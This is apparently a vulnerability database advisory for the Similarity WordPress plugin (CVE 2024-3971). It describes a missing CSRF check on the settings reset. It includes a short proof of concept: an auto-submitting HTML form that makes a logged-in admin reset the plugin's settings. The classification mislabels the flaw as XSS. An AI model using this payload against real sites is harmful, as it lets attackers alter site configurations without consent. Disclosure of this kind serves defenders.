Similarity <= 3.0 – Plugin Reset via CSRF | CVE 2024-3971 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=similarity%2Fsimilarity.php" method="post">
        <input type="hidden" name="restore_defaults" value="Restore Defaults" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

5dec5719-105d-4989-a97f-bda04d223322

Timeline

Publicly Published

2024-05-24 (about 1 months ago)

Added

2024-05-24 (about 1 months ago)

Last Updated

2024-05-24 (about 1 months ago)

Other

Published

Title

Published

2022-06-20

Title

Give < 2.21.0 - Reflected Cross-Site Scripting

Published

2022-03-01

Title

Database Peek <= 1.2 - Reflected Cross-Site Scripting

Published

2021-10-18

Title

Client Invoicing by Sprout Invoices < 19.9.7 - Admin+ Stored Cross-Site Scripting

Published

2022-12-20

Title

WOOCS < 1.3.9.3 - Contributor+ Stored XSS

Published

2024-01-17

Title

Essential Addons for Elementor < 5.9.5 - Contributor+ Stored Cross-Site Scripting via Image URl